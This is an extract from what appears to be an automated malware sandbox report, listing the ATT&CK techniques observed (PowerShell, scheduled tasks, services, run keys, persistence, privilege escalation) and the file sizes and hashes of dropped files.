Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.0MB
MD566e7e13f5174dd1558fe12d6eab50b0d
SHA1f1ef209c02c2b4e7aa4d1e99068e3e9fe45b51e9
SHA256326135f25eff5cc8f0ec045467a24a326e88745c0efaa03ff04d220ea4b13105
SHA512b941640c71070b164d7f5b92a6ccffb4c2b69c45d54bb083f0dc7d9fed098618fd7ed4cf245aeba435bdbef13b844f3dccf4a4b1a576edacecb631255da0b1cb
-
Filesize
4.2MB
MD51694a7e94cdbb7b4bbdcc7d39db9665c
SHA1d9edcbc7848ec39abf724c9e9e0da6475eed1e91
SHA25666dcd34feca9880f03d1486f9ad8ca02c3760669b23ef17afb65ab620dfc49c0
SHA5127b4d6e4bf038721535a83d97fe060bcc56972ad732a6fbd4a66acfaec998eb8aed91f376b09437269bcbac120bd39ca89e5f4bc8eade293faeaaff07943ac436
-
Filesize
89KB
MD5499e35df562563babfff6a1d2ee71743
SHA17bece5115d9df1fa43b6a7a69f9574a498388960
SHA2566ebd5512d5cede4fdf769c35a48727c5fd5acb8ac40ae4c5ea7e9ca37fc8747b
SHA5122df1934de1f45661ab929a7f7658478f5a3d8cacfbe682f1f6b8bee8a49ab2720141a1c0ea74608e14002ff5132cb0932c7fb5b3790575b5e23c5327adfdf377
-
Filesize
229KB
MD5f94e3703ca371767d93f5a88b74fbee7
SHA180530e8ffb3fc7d2c36e339b70bcae0d0014b7f5
SHA256954af7a9095306263dce0c4d05eda925de49041ad6ea7c37a23fed8cbc97f1d7
SHA512ca0ba2f5a26a26eeb0e15a5b99be937b7d695411f043b1629ef10f7106f26a1096229f763b0ab86796d8f37efc62f469e399206d7a8c706e4043112269f01066
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d65b4e32aabe27e536fa6e022e261898
SHA1eac588b8baae14e1630ff26986b7438442c73e35
SHA25699290594f3ab6c8513111ceb80dce67ccee67576226332bbade94175c984b393
SHA5129862a621bc0db50d24fed9f533437138305b07d4356f285cb7e6df0110c67c184bac1e2bf6e2fcd759e306ee886936bdccb6b2713d12eb6a279e629990da532d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5df16b737d2b17300089b7929e770638e
SHA1058b36d7f1d1157957194779deb8c0f1c488f4b9
SHA2563fcd827dde75838ff8ba78aed57a9441037a835299643dfc88e2c6188dd54201
SHA512429411fbba4ec21e8128a89f2f8afdad747e81cccc19f76647e55fe0ab12c7aec87ec6b647820bd2dfb701cdf3fad0e29a192876cf852e7b920eba5542309de4
-
Filesize
3.9MB
MD5c67da1302d15ac126dd83ad15feae07c
SHA197d0354b914da35ec3a0a82e4517437377f6d7b6
SHA2567d6e3af82cc409217b54fa431084ee6195087e0f8e7c236dc93b38957bad1baf
SHA51223e1448c6f538637f6aec33cee9050499f0b70fca9308244161572f920e6fc678fc9ae814b813e4af95f6be1589da31eae0c8b9d5780f67b0dd469ac91117f7a
-
Filesize
4.4MB
MD5c379ea878a21194d58e8a4303cd69ef9
SHA11dd404638a2357ace1313ea747e7e3a76ac0790b
SHA2564350529c8e25e931298764dfec8d72302ca1a8038bc2f5f1054527f1cef0c412
SHA512f12802ca704490ac6a658841e21627252bc69b5c5b84a21acc0aa67052c0e439e2a6da11ef77857896088d5eef22e33fac94de860b93dff6065d9a1ea6f9b902
-
Filesize
5.0MB
MD5130df035c0e6dff9670a1ac38a05c575
SHA14b92ff37f74367e9f061a14234afeb78996b3dde
SHA2563456657a4b93eae6c909e3fbd9db371198fa8accc9b5317bc0bbc1eaf105f8ce
SHA512eb8dd85776a71956eeb396c34ded4714160f22cba111989d94f39d853551e5b1e0fa064003bee3ec0b07cfe58b5e8f6728bd54d706b7a6b3833f73b797ca6fa4